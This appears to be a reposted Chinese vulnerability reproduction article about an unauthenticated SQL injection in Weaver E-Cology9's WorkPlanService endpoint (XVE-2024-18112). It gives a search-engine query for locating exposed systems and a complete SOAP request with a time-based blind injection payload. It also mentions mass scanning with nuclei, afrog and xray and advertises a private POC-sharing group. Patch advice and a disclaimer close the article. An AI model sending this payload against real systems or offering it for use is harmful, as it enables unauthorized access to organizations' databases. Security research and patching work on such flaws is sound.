【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)

admin 2024年7月31日13:05:47评论88 views字数 977阅读3分15秒阅读模式

0x01 产品简介

某微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

该漏洞是由于某微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现 SQL 注入漏洞。

0x03 搜索引擎

app="泛微-OA(e-cology)"

【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)

0x04 漏洞复现

POST /services/WorkPlanService HTTP/1.1HOST: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36Content-Type: text/xml;charset=UTF-8Connection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">    <soapenv:Header/>      <soapenv:Body>      <web:deleteWorkPlan>         <!--type: string-->         <web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>         <!--type: int-->         <web:in1>22</web:in1>       </web:deleteWorkPlan>      </soapenv:Body></soapenv:Envelope>

【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)

0x05 工具批量

nuclei

【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)

afrog

【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)

xray

【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子

【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限

2、官方已发布升级补丁包,支持在线升级和离线补丁安装,可在参考链接https://www.weaver.com.cn/cs/securityDownload.html进行下载使用。

原文始发于微信公众号(nday POC):【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月31日13:05:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】某微E-Cology9 WorkPlanService 前台SQL注入漏洞(XVE-2024-18112)https://cn-sec.com/archives/3018393.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息